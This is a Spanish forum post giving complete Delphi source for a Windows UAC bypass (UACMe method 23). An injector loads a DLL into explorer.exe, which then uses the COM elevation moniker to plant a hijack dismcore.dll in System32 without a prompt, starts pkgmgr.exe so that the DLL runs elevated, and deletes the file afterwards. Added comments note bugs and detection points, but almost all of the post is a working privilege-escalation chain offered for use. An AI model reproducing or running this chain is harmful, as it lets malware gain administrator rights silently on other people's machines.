bypass uac pkgmgr.exe
Publicado: 14 Jul 2017, 09:42
por joselin
créditos
método 23 de UACMe
y
el programa que inyecta la DLL en explorer
tiene 2 botones: uno inyecta la DLL y otro la descuelga del proceso
la DLL a inyectar
copia la DLL maligna final que va a ser cargada
por dism.exe
la hijack dll
la DLL dismcore.dll, que puede contener instrucciones buenas o malas
método 23 de UACMe
y
el programa que inyecta la DLL en explorer
tiene 2 botones: uno inyecta la DLL y otro la descuelga del proceso
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,tlhelp32,psapi,SWSystem;
type
TForm1 = class(TForm)
// Injector form. Button1 injects uac.dll into explorer.exe and Button2 unloads
// it again (see Button1Click / Button2Click in the implementation section).
// Button5Click and Button6Click are declared but not implemented in the code
// shown here, and Button3/Button4 have no handler at all — presumably trimmed
// when the post was written; confirm against the original project.
Button1: TButton;
Button2: TButton;
Button3: TButton;
Button4: TButton;
Button5: TButton;
Button6: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure Button5Click(Sender: TObject);
procedure Button6Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
// Module handle of uac.dll inside the target process. Filled by InjectDll from
// the exit code of the remote LoadLibraryA thread and reset to 0 by desload;
// both routines use it as the "already injected?" flag.
ModuleHandle: DWORD;
implementation
{$R *.dfm}
// Enables (Enable = TRUE) or disables one named privilege on the current
// process token through AdjustTokenPrivileges.
// PrivilegeName: privilege name as understood by LookupPrivilegeValue; the
//   callers in this unit pass 'SeDebugPrivilege'.
// Returns: the raw AdjustTokenPrivileges result. That API returns TRUE even
//   when the token does not hold the privilege (GetLastError =
//   ERROR_NOT_ALL_ASSIGNED), so TRUE does not prove the privilege is active.
// NOTE(review): hToken is closed only on the LookupPrivilegeValue success
//   path; when the lookup fails the token handle leaks.
// Detection note: a GUI process toggling SeDebugPrivilege is recorded as a
//   token-right adjustment (Security event 4703) when that audit category is
//   enabled, and in this program it directly precedes cross-process writes.
function EnablePrivilege(PrivilegeName: PChar; Enable: Boolean): Boolean;
var
hToken: THandle;
Tp: TOKEN_PRIVILEGES;
Luid: TLargeInteger;
begin
Result:= FALSE;
if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or
TOKEN_QUERY or TOKEN_READ, hToken) then
if LookupPrivilegeValue(nil,PrivilegeName,Luid) then
begin
Tp.PrivilegeCount:= 1;
Tp.Privileges[0].Luid:= Luid;
if Enable then
Tp.Privileges[0].Attributes:= SE_PRIVILEGE_ENABLED
else
Tp.Privileges[0].Attributes:= 0;
// PDWORD(nil)^ passes a nil pointer for the "previous state" length, i.e. the
// previous privilege state is not requested.
Result:= AdjustTokenPrivileges(hToken,FALSE,Tp,0,nil,PDWORD(nil)^);
CloseHandle(hToken);
end;
end;
// Returns the PID of the first running process whose image name equals
// ProcessName, or 0 when nothing matches or an exception is raised.
// ProcessName: compared with the Delphi string `=` operator, i.e. case-
//   sensitively, so 'Explorer.exe' does not match 'explorer.exe'.
// NOTE(review): the Toolhelp snapshot handle (MyHandle) is never closed on
//   any path, so every call leaks a handle, and the blanket `except ... Exit`
//   hides all failures behind a 0 result.
function GetPID(ProcessName: string): DWORD;
var MyHandle: THandle;
Struct: TProcessEntry32;
begin
Result:=0;
try
MyHandle:=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
// dwSize must be set before Process32First or the call fails.
Struct.dwSize:=Sizeof(TProcessEntry32);
if Process32First(MyHandle, Struct) then
if Struct.szExeFile=ProcessName then
begin
Result:=Struct.th32ProcessID;
Exit;
end;
while Process32Next(MyHandle, Struct) do
if Struct.szExeFile=ProcessName then
begin
Result:=Struct.th32ProcessID;
Exit;
end;
except on exception do
Exit;
end;
end;
// Loads dllName into process TargetProcessID by the classic remote-thread
// technique: allocate room for the path in the target, write the path there,
// and start a thread at kernel32!LoadLibraryA with that address as argument.
// LoadLibraryA's return value (the new HMODULE) comes back as the thread exit
// code and is stored in the global ModuleHandle, which desload later passes
// to FreeLibrary. Runs only while ModuleHandle = 0 (nothing injected yet).
// TargetProcessID: PID from GetPID; 0 makes OpenProcess fail and the routine
//   exit early.
// dllName: ANSI path; Button1Click passes gsAppPath + 'uac.dll'.
// NOTE(review): VirtualFreeEx with MEM_RELEASE requires dwSize = 0 per the
//   Win32 contract, so the free below is expected to fail, and because
//   CloseHandle(hProcess) sits inside that condition the process handle is
//   then never closed. The bytes-written out-parameter of WriteProcessMemory
//   is passed as PDWORD(nil)^, so a short write is not detected.
// Detection note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
//   WriteProcessMemory -> CreateRemoteThread with LoadLibraryA as start
//   address is exactly the pattern remote-thread telemetry (e.g. Sysmon
//   event 8, EDR injection sensors) exists to surface; here the target is
//   explorer.exe and the DLL comes from the injector's own directory.
procedure InjectDll(TargetProcessID : DWORD; dllName : pansichar);
var
LibName : pointer;
hProcess , ThreadHandle : Thandle;
begin
if ModuleHandle = 0 then
if EnablePrivilege('SeDebugPrivilege', TRUE) then
begin
hProcess := OpenProcess( PROCESS_ALL_ACCESS, FALSE, TargetProcessID );
if (hProcess = 0) then exit;
// allocate and write the dll name to the remote process
// (VirtualAllocEx zero-fills, so the +1 provides the NUL terminator that
// WriteProcessMemory does not copy: it writes strlen(dllName) bytes only)
LibName := VirtualAllocEx(hProcess , 0, strlen(dllName) + 1 , MEM_COMMIT , PAGE_READWRITE) ;// was +5 before?
//LibName := VirtualAllocEx(hProcess , 0, Length(dllName) + 1 , MEM_COMMIT , PAGE_READWRITE) ;// was +5 before?
if ( LibName <> nil) then
begin
WriteProcessMemory(hProcess , LibName, (dllName) , strlen(dllName) , PDWORD(nil)^);
end ;
// kernel32 is mapped at the same base in every process of the same bitness,
// which is what makes using the local LoadLibraryA address remotely work.
ThreadHandle := CreateRemoteThread( hProcess , nil , 0, GetProcAddress(GetModuleHandle('kernel32.dll'), 'LoadLibraryA') , LibName ,0 , PDWORD(nil)^);
if ThreadHandle <> 0then begin
WaitForSingleObject( ThreadHandle , INFINITE); //wait for the thread to execute
// thread exit code == LoadLibraryA result == HMODULE of the injected DLL
GetExitCodeThread(ThreadHandle,ModuleHandle);
CloseHandle(ThreadHandle);
// free the memory we allocated for the dll name
if VirtualFreeEx( hProcess , LibName ,Length(dllName)+1 , MEM_RELEASE)<> nil then
CloseHandle(hProcess);
end;
end;
// privilege is dropped again on every path, including early exits above
EnablePrivilege('SeDebugPrivilege', FALSE);
end;
//descolgar dll
// Counterpart of InjectDll: starts a remote thread at kernel32!FreeLibrary
// with the saved ModuleHandle as argument so the target process unloads the
// DLL, then clears ModuleHandle. Runs only when ModuleHandle <> 0.
// TargetProcessID: PID of the process that was injected (explorer.exe via
//   Button2Click); 0 or an unopenable PID leaves ModuleHandle untouched.
// NOTE(review): hProcess is closed only when CreateRemoteThread succeeds;
//   on the failure path the process handle leaks.
procedure desload(TargetProcessID : DWORD);//(dllName : string): boolean;
var
hProcess , ThreadHandle : Thandle;
begin
if ModuleHandle <> 0 then
if EnablePrivilege('SeDebugPrivilege', TRUE) then
begin
hProcess := OpenProcess( PROCESS_ALL_ACCESS, FALSE, TargetProcessID );
if hProcess <> 0 then
begin
// Pointer(ModuleHandle) is the HMODULE recorded by InjectDll.
ThreadHandle := CreateRemoteThread(hProcess, nil, 0,GetProcAddress(GetModuleHandle('Kernel32'),'FreeLibrary'),Pointer(ModuleHandle), 0, PDWORD(nil)^);
if ThreadHandle <> 0 then begin
WaitForSingleObject( ThreadHandle , INFINITE); //wait for the thread to execute
closehandle( ThreadHandle );
// FreeLibrary's own result is not read; success is assumed.
ModuleHandle:= 0;
CloseHandle(hprocess);
end;
end;
end;
EnablePrivilege('SeDebugPrivilege', FALSE);
end;
// "Inject" button: loads uac.dll, taken from gsAppPath (a value from the
// SWSystem unit in the uses clause; presumably the application directory —
// confirm), into the first process named explorer.exe. If no such process is
// found pid is 0 and InjectDll exits at its OpenProcess check.
// The local `s` is declared but never used.
procedure TForm1.Button1Click(Sender: TObject);
var
pid:dword;
s:string;
begin
pid:=getpid('explorer.exe');
InjectDll(pid,pansichar(ansistring(gsAppPath)+'uac.dll')) ;
end;
// "Unload" button: asks explorer.exe to FreeLibrary the module recorded in
// ModuleHandle (see desload). Does nothing if nothing was injected.
procedure TForm1.Button2Click(Sender: TObject);
var
pid:dword;
begin
pid:=getpid('explorer.exe');
desload(pid);
end;
la DLL a inyectar
copia la DLL maligna final que va a ser cargada
por dism.exe
library Project1;
uses
SysUtils,
ShlObj,
shellapi,
ActiveX,
dialogs,
windows,
Classes;
{$R *.res}
type
// Local definition of the Win32 BIND_OPTS3 structure passed to CoGetObject
// (presumably because this Delphi version's ActiveX unit lacks it — confirm).
// Only cbStruct and dwClassContext are assigned by DELETEFIL/COPYFIL below;
// the other fields keep the zero value Delphi gives global variables.
PBindOpts3 = ^TBindOpts3;
{$EXTERNALSYM tagBIND_OPTS3}
tagBIND_OPTS3 = record
cbStruct: DWORD;
grfFlags: DWORD;
grfMode: DWORD;
dwTickCountDeadline: DWORD;
dwTrackFlags: DWORD;
dwClassContext: DWORD;
locale: LCID;
pServerInfo: Pointer;
hwnd: hwnd;
end;
TBindOpts3 = tagBIND_OPTS3;
{$EXTERNALSYM BIND_OPTS3}
BIND_OPTS3 = TBindOpts3;
VAR
// COM state shared by DELETEFIL and COPYFIL. These are globals, so the two
// routines are not reentrant; the interface references are never released
// explicitly (Delphi interface globals are reference counted and presumably
// go away at library unload — confirm).
pFileOp : IFileOperation;
pSHISource : IShellItem;
pSHIDestination : IShellItem;
pSHIDelete : IShellItem;
// COM elevation moniker string; both routines assign the same literal.
szEIFOMoniker :widestring;
pIID_EIFO : TGUID;
pIID_ShellItem : TGUID;
pIID_ShellItem2 : TGUID;
bo : TBindOpts3;
//**************************************************
// Deletes the file SZELEVDLLFULL through an IFileOperation obtained with the
// COM elevation moniker "ELEVATION:ADMINISTRATOR!NEW:" + the IFileOperation
// CLSID. Because the calling process is explorer.exe (this DLL is injected
// there), Windows auto-elevates the request without a consent prompt; this is
// the core of what the post calls UACMe method 23. DllMain uses it to remove
// the planted c:\windows\system32\dismcore.dll afterwards.
// Returns: always 0; none of the HRESULTs inside are surfaced to the caller.
// Structure note: the `then` on the CoInitialize line governs only the next
//   statement (bo.cbStruct := …); there is no begin/end, so everything from
//   bo.dwClassContext onwards runs unconditionally. pIID_ShellItem2 is
//   assigned but never used (the call below passes IID_iShellItem).
// Mitigation/detection: the silent elevation requires the default UAC level;
//   at "Always notify" this moniker produces a consent prompt. On the host the
//   operation appears as an elevated COM surrogate (typically dllhost.exe)
//   deleting a file in System32 on behalf of a medium-integrity explorer.exe.
FUNCTION DELETEFIL (SZELEVDLLFULL:STRING):HRESULT;
begin
IF (CoInitialize (NIL) <> S_OK) then
bo.cbStruct := SizeOf(BIND_OPTS3);
bo.dwClassContext := CLSCTX_LOCAL_SERVER;
szEIFOMoniker := ('ELEVATION:ADMINISTRATOR!NEW:{3AD05575-8857-4850-9277-11B85BDB8E09}');
pIID_EIFO := iFileOperation;
pIID_ShellItem2 := iShellItem2;
// FOFX_REQUIREELEVATION + FOFX_SHOWELEVATIONPROMPT are combined with the
// silent/no-UI flags, so no dialog is expected on the auto-elevated path.
IF (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) AND
(pFileOp <> NIL) AND
(pFileOp.SetOperationFlags (FOF_NOCONFIRMATION OR FOF_SILENT OR FOFX_SHOWELEVATIONPROMPT OR
FOFX_NOCOPYHOOKS OR FOFX_REQUIREELEVATION OR FOF_NOERRORUI) = S_OK) AND
(SHCreateItemFromParsingName(pwidechar(szElevDllFull), Nil, IID_iShellItem,pSHIDelete)=S_OK) THEN
IF ( pFileOp.DeleteItem(pSHIDelete, NIL)= S_OK) THEN
IF (pFileOp.PerformOperations = S_OK) then
begin
end;
CoUninitialize;
result:=0;
end;
//********************************************************
// Copies SZSOURCEDLL into directory SZELEVDIR through an IFileOperation
// obtained with the COM elevation moniker (same mechanism as DELETEFIL).
// DllMain calls it with %TEMP%\dismcore.dll and c:\windows\system32\, i.e.
// it plants the DLL that pkgmgr.exe's servicing path will later load.
// Returns: always 0; the HRESULTs of the individual steps are not surfaced.
// Structure note: as in DELETEFIL, the `then` after CoInitialize governs only
//   the cbStruct assignment; the rest of the body runs unconditionally.
// Mitigation/detection: requires the default UAC level (no prompt at "Always
//   notify"); on the host it appears as a file created directly in System32
//   by the elevated COM surrogate on behalf of medium-integrity explorer.exe,
//   which is a useful file-create / integrity-level detection boundary.
FUNCTION COPYFIL (SZSOURCEDLL,SZELEVDIR:STRING):HRESULT;
begin
IF (CoInitialize (NIL) <> S_OK) then
bo.cbStruct := SizeOf(BIND_OPTS3);
bo.dwClassContext := CLSCTX_LOCAL_SERVER;
szEIFOMoniker := ('ELEVATION:ADMINISTRATOR!NEW:{3AD05575-8857-4850-9277-11B85BDB8E09}');
pIID_EIFO := iFileOperation;
pIID_ShellItem := iShellItem;
// Every step is chained with AND, so the first failing call short-circuits
// the rest; nothing records which step failed.
IF (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) AND
(pFileOp <> NIL) AND
(pFileOp.SetOperationFlags (FOF_NOCONFIRMATION OR FOF_SILENT OR FOFX_SHOWELEVATIONPROMPT OR
FOFX_NOCOPYHOOKS OR FOFX_REQUIREELEVATION OR FOF_NOERRORUI) = S_OK) AND
(SHCreateItemFromParsingName(pwidechar(szSourceDll), NIL, pIID_ShellItem, pSHISource) = S_OK) AND
(pSHISource <> NIL) AND
(SHCreateItemFromParsingName(pwidechar(szElevDir), NIL, pIID_ShellItem, pSHIDestination) = S_OK)
AND
(pSHIDestination <> NIL) AND
(pFileOp.CopyItem(pSHISource, pSHIDestination, nil, NIL) = S_OK) AND
(pFileOp.PerformOperations = S_OK) then
begin
end;
CoUninitialize;
result:=0;
end;
//**********************************************************************************
// Runs FILENAME with command line PARAM in working directory DIR via
// ShellExecuteEx and blocks until the process exits.
// Returns: always TRUE — the ShellExecuteEx result is not checked. When the
//   launch fails, SHInfo.hProcess is 0, WaitForSingleObject returns
//   WAIT_FAILED at once and the loop exits, still yielding TRUE.
// NOTE(review): the process handle obtained through SEE_MASK_NOCLOSEPROCESS
//   is never closed, and the TRY..FINALLY has an empty FINALLY part.
// Detection note: DllMain calls this as EXECANDWAIT('pkgmgr.exe', '/n:s ',
//   'c:\windows\system32\') from inside explorer.exe, so the observable is
//   explorer.exe spawning pkgmgr.exe (process-create telemetry such as
//   Sysmon event 1 / Security event 4688).
FUNCTION EXECANDWAIT(FILENAME,param,DIR:string): BOOLEAN;
VAR
Shinfo: SHELLEXECUTEINFO;
ExitCode:DWORD;
begin
FillChar(ShInfo, SizeOf(ShInfo), 0);
Shinfo.cbSize := sizeof(SHELLEXECUTEINFO);
// keep hProcess open so it can be waited on below
Shinfo.fMask := SEE_MASK_NOCLOSEPROCESS; //SEE_MASK_NO_CONSOLE:
Shinfo.lpFile := PwideChar(Filename);
Shinfo.lpParameters :=(pwidechar(param));//nil;//PANSICHAR(ANSISTRING(PARAMS));
Shinfo.lpDirectory := pwidechar(dir);//PCHAR(EXTRACTFILEDIR(FILENAME));
Shinfo.nShow :=sw_show;
ShellExecuteEx(@Shinfo);
TRY
// ExitCode here holds the wait status, not the child's exit code.
repeat
ExitCode := WaitForSingleObject(SHInfo.hProcess,INFINITE);
until (ExitCode <> WAIT_TIMEOUT);
result:=TRUE;
FINALLY
end;
end;
// DllProc handler of the injected uac.dll. Everything here executes inside
// the host process (explorer.exe, see Button1Click in the injector unit).
// DLL_PROCESS_ATTACH is the payload sequence of UACMe method 23:
//   1. COPYFIL plants %TEMP%\dismcore.dll into c:\windows\system32\ through
//      the auto-elevated IFileOperation (no prompt, because the caller is
//      explorer.exe);
//   2. EXECANDWAIT starts pkgmgr.exe (a legacy auto-elevating servicing tool)
//      and waits; per the post its servicing path (dism.exe) then loads the
//      planted dismcore.dll, so that DLL's code runs elevated;
//   3. DELETEFIL removes the planted file again.
// Structure notes: the `if fileexists(...) then` governs only the `s :=`
//   assignment (no begin/end), so steps 2 and 3 run whether or not the copy
//   succeeded; `s` is not declared anywhere in this library as shown, so the
//   block does not compile as posted — presumably trimmed for the forum.
// Detection/mitigation: explorer.exe spawning pkgmgr.exe; pkgmgr.exe/dism.exe
//   loading a non-Microsoft dismcore.dll placed directly in System32
//   (image-load telemetry such as Sysmon event 7); a file created in System32
//   by the elevated COM surrogate on behalf of a medium-integrity process;
//   and the UAC "Always notify" level, which removes the silent elevation the
//   whole chain depends on. The UACMe README records the Windows build in
//   which method 23 was reported fixed.
procedure DllMain(reason: integer);
begin
case reason of
DLL_PROCESS_ATTACH:
begin
COPYFIL(GetEnvironmentVariable('TEMP') +'\dismcore.dll','c:\windows\system32\');
if fileexists('c:\windows\system32\dismcore.dll' )then
// XML manifest placed by hand in the TEMP folder, said to be needed for the
// unattended installation or similar (original author's note)
s:='"'+(GetEnvironmentVariable('TEMP') +'\mani.xml"');
EXECANDWAIT('pkgmgr.exe','/n:s ','c:\windows\system32\');
DELETEFIL ('c:\windows\system32\dismcore.dll');
end;
DLL_PROCESS_DETACH:
begin
// modal message box shown from inside the host process on unload
showmessage('al cerrarse el proceso inyectado'+ #10#13 + ' unload la dll');
//DLL unloading...
end;
DLL_THREAD_ATTACH:
begin
end;
DLL_THREAD_DETACH:
begin
end;
end;
end; (*DllMain*)
// Library initialisation. This runs while the DLL is being loaded, i.e. on
// the remote LoadLibraryA thread InjectDll created in explorer.exe. DllProc
// is installed so later attach/detach notifications reach DllMain, and
// DLL_PROCESS_ATTACH is passed explicitly because the initial attach has
// already happened by the time DllProc is set (presumably why the author
// calls it by hand — confirm). The whole payload therefore runs during
// LoadLibrary, before the injector's WaitForSingleObject returns.
begin
DllProc := @DllMain;
DllProc(DLL_PROCESS_ATTACH) ;
end.
la DLL dismcore.dll, que puede contener instrucciones buenas o malas
Windows,dialogs;
// DllProc handler of the stand-in dismcore.dll that COPYFIL plants in
// System32. It is loaded by pkgmgr.exe's servicing path (per the post, via
// dism.exe), so this code executes with that process's elevated token; in
// this build it only displays a message box and then terminates the host
// with ExitProcess. ExitCode is not declared here and is presumably the
// System unit's global (0 unless set) — confirm.
// Detection note: an elevated dism.exe/pkgmgr.exe loading a non-Microsoft
// dismcore.dll from System32 and then exiting abnormally is the observable
// for this stage.
procedure EntryPoint(Reason: dword); stdcall;
begin
if Reason = DLL_PROCESS_ATTACH then
begin
MessageBox(0, 'haaa pillin sos muy malote !!!', 'susesfuly pelotudo', 0);
// not sure why, but without ExitProcess it ends with a COM error
// (original author's note)
ExitProcess(exitcode);
end;
if Reason = DLL_THREAD_ATTACH then
begin
end;
if Reason =DLL_THREAD_DETACH then
begin
end;
if Reason = DLL_PROCESS_DETACH then
begin
end;
end;
(*DllMain*)
// Library initialisation of the stand-in dismcore.dll: install EntryPoint as
// DllProc and deliver the initial DLL_PROCESS_ATTACH by hand, since the real
// attach has already happened when this block runs. Because EntryPoint calls
// ExitProcess on attach, control never returns from the second line.
begin
DLLProc := @EntryPoint;
EntryPoint(DLL_PROCESS_ATTACH);
end.